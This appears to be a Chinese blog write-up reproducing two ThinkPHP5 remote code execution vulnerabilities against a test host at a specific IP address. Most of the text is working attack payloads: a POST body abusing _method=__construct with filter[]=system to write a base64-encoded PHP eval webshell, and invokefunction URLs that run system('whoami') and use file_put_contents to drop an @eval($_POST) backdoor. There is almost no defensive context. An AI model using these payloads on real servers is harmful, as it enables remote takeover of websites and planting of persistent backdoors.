复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

ThinkPHP5 5.0.23远程代码执行漏洞

复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第1张图片
http://159.75.16.25:8089/index.php?s=captcha会出现如下报错
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第2张图片
F12进入开发者 用HackBar 插件发送 POST 请求
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第3张图片
得到回显:
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第4张图片
通过echo命令写入 Webshell 文件
首先将一句话木马进行 Base64 编码
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第5张图片
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2FhYSddKSA/PmJi | base64 -d > shell.php
访问shell.Php
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第6张图片
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第7张图片
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第8张图片

Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第9张图片
/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第10张图片
http://159.75.16.25:8087/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第11张图片
http://159.75.16.25:8087//index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wh.php&vars[1][]=%3C?php%20@eval($_POST[%27wang%27]);%20?%3Ehao
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第12张图片
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞_第13张图片

你可能感兴趣的:(php)